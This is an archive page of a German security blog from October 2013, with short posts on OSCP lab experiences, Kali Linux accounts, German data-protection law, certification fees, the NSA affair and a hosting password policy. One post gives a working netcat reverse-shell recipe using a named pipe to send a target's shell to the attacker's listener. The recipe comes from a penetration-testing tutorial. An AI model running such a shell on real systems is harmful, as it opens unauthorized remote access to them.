Archiv für den Monat: Oktober 2013

31 10, 2013

Unprivilegierter User-Account in Kali Linux

von |31. Oktober 2013|Pentest|0 Kommentare|

So direkt kann ich nicht nachvollziehen, warum Backtrack bzw. jetzt Kali Linux ihre Penetration Tester konsequent als root arbeiten lassen. Ein unprivilegierter User-Account und die Nutzung von sudo wären meiner Ansicht nach die bessere Wahl. Man benutzt schließlich als Sicherheitsspezialist eine Linux-Distribution, die genauso angegriffen werden kann wie man selbst Systeme angreift.

Einen lokalen Nutzer anlegen:

adduser localuser

usermod -G sudo localuser

28 10, 2013

Remote-Shell mit Netcat ohne „-e“ exec

von |28. Oktober 2013|Pentest|0 Kommentare|

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:

kali# nc -nvlp 4444

host# mknod /tmp/pipe p

host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe

Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..

27 10, 2013

Erfahrungen zum OSCP: Teil 5 Es zieht sich.

von |27. Oktober 2013|Pentest|0 Kommentare|

Mein aktueller Stand:

  • 5x privilegierte Rechte
  • 6x unprivilegierte Rechte
  • Freischaltung DEV- und IT-Netz

Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen.

Es fühlt sich ein klein wenig an, als würde ich wieder eine wissenschaftliche Abschlussarbeit schreiben. Der OSCP ist sicherlich interessanter, keine Frage. Parallelen gibt es dennoch. Ohne Ausdauer und Ehrgeiz ist auch der OSCP nicht zu schaffen. Insbesondere wenn man noch recht am Anfang ist und mehr als die Hälfte noch vor sich hat.

Ich schätze, dass ich bis zum Ende mehr Zeit investieren werde, als für die Vorbereitungen auf CISSP, CISM, TISP usw. zusammen. Der OSCP bringt 40 CPE für CISSP und CISM –  das ist ein lachhafter Wert. Wer den OSCP in 40 Stunden inklusive Prüfung und Dokumentation erfolgreich hinter sich bringt, hat meine Bewunderung verdient. Ich halte das für nahezu unmöglich.

27 10, 2013

Dynamische IP-Adressen sind nach dem Landgericht Berlin keine personenbezogenen Daten

von |27. Oktober 2013|Datenschutz|0 Kommentare|

Das Landgericht Berlin hat entschieden (LG Berlin, 31.01.2013 – 57 S 87/08)[1], dass dynamische IP-Adressen keine personenbezogenen Daten sind. Die Richter bemühten sich, die Augen nicht vor der technischen Realität zu verschließen und nicht wie viele Datenschutzbeauftragte unrealistische Annahmen zu treffen, wie einfach doch ein Personenzug herstellbar sei. Ich muss anerkennen, dass das meiner Ansicht nach eine gute Bewertung der Realität und auch ein gutes Urteil ist.

Wirklich viel ist damit aber für niemanden gewonnen. Das Urteil ist keine finale Entscheidung, sodass die Rechtslage weiterhin undurchsichtig bleibt. Ein kleines aber sehr wichtiges Detail wird kaum erläutert: Das Urteil bezieht sich nur auf dynamische IP-Adressen, bei statischen IP-Adressen muss weiterhin von personenbezogenen Daten ausgegangen werden. In der Praxis ändert sich dadurch nichts, das Thema IP-Adresse als personenbezogenes Datum ist weiterhin unklar und man müsste als Unternehmen annehmen, dass IP-Adressen grundsätzlich personenbezogen sind.

Wie kann man sich als Unternehmen rechtssicher und realistisch die Einwilligung eines Nutzers einholen, dass seine IP-Adresse gespeichert werden darf? Ich meine gar nicht. Das eine Unternehmen wird gar keine IP-Adressen mehr speichern und ein anderes weiterhin möglichen rechtlichen Risiken ausgesetzt sein. Beide Alternativen sind schlecht.

Ich finde der gesetzliche Datenschutz muss an die Realität angepasst und reformiert werden.

[1] http://dejure.org/dienste/vernetzung/rechtsprechung?Text=57%20S%2087/08

26 10, 2013

Datenschutz betrifft auch Kleinstunternehmen

von |26. Oktober 2013|Datenschutz|0 Kommentare|

Das ist jetzt eine kleine Verallgemeinerung, aber in der Regel müssen Unternehmen größer als 9 Personen einen internen oder externen Datenschutzbeauftragten bestellen. Diese Personen müssen zwar mit einer automatisierten Bearbeitung personenbezogener Daten beschäftigt sein, aber bereits durch ein E-Mail-Programm wird diese Voraussetzung erfüllt.

Wie sieht es nun mit kleineren Unternehmen aus: Einzelunternehmen, Personengesellschaften oder kleine GmbHs, die aus 9 Personen oder weniger bestehen? Nun, diese müssen keinen Datenschutzbeauftragten bestellen. Glück gehabt?

Nein, denn die Vorschriften des BDSG gelten dennoch. Verantwortlich für die Einhaltung und Kontrolle des Datenschutzes bleibt die verantwortliche Stelle, das heißt die Person, die die Geschäfte führt. Alle Pflichten aus dem Bundesdatenschutzgesetz sind zu erfüllen und nur die  Bestellung eines Datenschutzbeauftragten entfällt. Welche kleine Personengesellschaft oder Kapitalgesellschaft führt nun in der Realität ein Verfahrensverzeichnis? Welches kleine Unternehmen ist auf eine datenschutzrechtliche Auskunftsanfrage von einem Kunden oder auch nur von einem Besucher der Unternehmenswebseite vorbereitet? Ich vermute kaum eins.

Sucht man im Netz nach Vorschriften zum Datenschutz und liest man sich nicht die spannende Bettlektüre des Bundesdatenschutzgesetzes durch, wird einem oftmals der Eindruck vermittelt der gesetzliche Datenschutz gelte nur für Unternehmen mit mehr als 9 Personen. Das stimmt nicht.

In der Praxis hat ein kleines Unternehmen gar keine andere Wahl als auf einen externen Datenschutzbeauftragten zurückzugreifen. Er muss zwar nicht bestellt werden, aber er hat das notwendige Know-how, welches intern meistens nicht zu finden ist. Meistens wird das Thema vom Geschäftsführer jedoch einfach ignoriert und zwar genau so lange, bis das Kind bereits in den Brunnen gefallen ist.

25 10, 2013

Der jährliche Preis von CISSP und CISM im Vergleich

von |25. Oktober 2013|Zertifizierung|0 Kommentare|

Ich habe heute die jährlichen Gebühren für den CISSP von Isc² und für den CISM von ISACA beglichen. Zum Erhalt der Zertifizierung reicht dies natürlich nicht, da noch der Nachweis von jährlichen CPEs (Continuous Professional Education) zu erbringen ist. Unabhängig davon möchte der Isc² für den CISSP $85 Maintenance Fee. Das kann man nun als viel, wenig oder angemessen betrachten. Ist auch egal, die ISACA nimmt einem diese Entscheidung ab. Der jährliche Preis dort:

  • $135 für die ISACA-Mitgliedschaft
  • $50 für das German Chapter
  • $45 für den CISM

Jetzt einmal ernsthaft: Nur $230? Also nur das 2,7 fache als für den Erhalt des CISSP von Isc². Das Preis/Leistungsverhältnis halte ich für verbesserungswürdig. Dagegen ist der Erhalt des CISSP günstig.

25 10, 2013

Der NSA-Skandal als Security Awareness-Kampagne

von |25. Oktober 2013|Informationssicherheit|0 Kommentare|

Vielen Dank liebe NSA für diese herausragende Security Awareness-Kampagne in der deutschen Bevölkerung. Erst am Anfang einmal starke Aufmerksamkeit erwecken, dass unverschlüsselte Kommunikation abgehört werden kann. Korrektur, wird. Die meisten Deutschen wissen nun, dass die NSA durch PRISM mitlesen kann, wenn sie möchte. So arbeitet man klar heraus, warum man z.B. bei vertraulicher Kommunikation Verschlüsselung einsetzen sollte. In den Medien wimmelte es von Artikeln, wie man PGP oder ähnliches einrichtet. Ein perfekter Einstieg in die erste deutsche Security Awareness-Kampagne. Und das alles kostenlos.

Bevor wirklich wieder Ruhe einkehrt wird bekannt, dass die NSA angeblich auch Verschlüsselung brechen kann. Panik, nichts ist mehr vor der NSA sicher. Damit so eine Kampagne Erfolg hat, einfach immer mal wieder eine bisschen nachschießen. In wie weit diese Aussagen stimmen, sei einmal dahin gestellt und in den Medien wird viel Blödsinn berichtet. Egal, es kommt in den Köpfen an: Man muss starke Geschütze auffahren, wenn man der NSA etwas entgegensetzen möchte.

Der Skandal ebbt nun ab. Ach nein, stimmt ja gar nicht. Die NSA soll auch die Bundesregierung abhören. Perfekt, niemand ist vor der NSA sicher. Es ist nicht nur die eigene Privatsphäre bedroht, sondern auch die der deutschen Kanzlerin. Dass Frau Merkel eigentlich ein sicheres Mobiltelefon habe sollte, und sie manchen Presseberichten nach auch gerne mit gewöhnlichen Mobiltelefon kommuniziert, passt perfekt als Botschaft: Wer Krypto zur Verfügung hat und sie nicht einsetzt, ist selbst dran schuld. Die NSA hört und liest mit.

Danke NSA. Was kommt nächsten Monat? Vielleicht hat der BND die NSA bei der Abhöraktion von Frau Merkel unterstützt? Man darf gespannt sein.

Wer Ironie findet, darf sie gerne behalten.

23 10, 2013

Änderung Webdesign/-layout

von |23. Oktober 2013|Allgemein|0 Kommentare|

Ich habe das Design vom Blog geändert und werde demnächst auch www.patricksauer.net und www.sauer-security.de anpassen. Die Vereinheitlichung soll einen starken Wiedererkennungswert der verschiedenen Webseiten liefern.

Unter blog.patricksauer.net werde ich weiterhin privat zu Themen schreiben, genauso wird www.patricksauer.net weiterhin eine Web-Visitenkarte von mir darstellen. Das Projekt www.sauer-security.de ist noch nicht online, ich werde dort einen eher kommerziellen Charakter verflogen und mehr berufliche Informationen zu mir anbieten.

18 10, 2013

Passwortrichtlinien bei 1&1 VServer Initialisierung

von |18. Oktober 2013|Allgemein|0 Kommentare|

Ich habe einen VServer bei 1&1 geordert, der direkt mit Centos aufgesetzt wurde. Nachdem ich persönlich eine andere Distribution bevorzuge, wollte ich ihn neu initialisieren lassen. Vor der Initialisierung kann man ein neues Initialpasswort festlegen. Gesagt, getan:

1und1_pw1

Ja natürlich, wie kann ich nur auf die Idee kommen ein Passwort länger als 12 Zeichen zu benutzen. Wer macht das schon und warum auch? Also wieder zurück in den keepassx und ein neues Passwort generieren lassen. Dieses Mal mit 12 Zeichen. Sicher ist sicher.

1und1_pw2

Passwörter länger als 12 Zeichen sind böse, Passwörter mit Sonderzeichen erlaubt das System auch nicht. Das ist jetzt ein schlechter Scherz oder? Ich konnte dann gerade noch widerstehen als Passwort 123456 auszuprobieren.

17 10, 2013

Erfahrungen zum OSCP: Teil 4 Reverten tut gut

von |17. Oktober 2013|Pentest|0 Kommentare|

Über das eigene Labpanel kann man beim OSCP Server in ihren Ausgangszustand zurückversetzen (reverten). Man kann zwar selbst jeden Tag nur eine begrenzte Anzahl von Servern reverten, dennoch lohnt es sich, dieses vor einem Angriff durchzuführen.

Andere OSCP-Studenten hinterlassen eventuell defekte Applikationen oder Files wie Webshells, die einen eigenen Angriff entweder beeinträchtigen können oder zumindest das Potential haben für Verwirrung zu sorgen.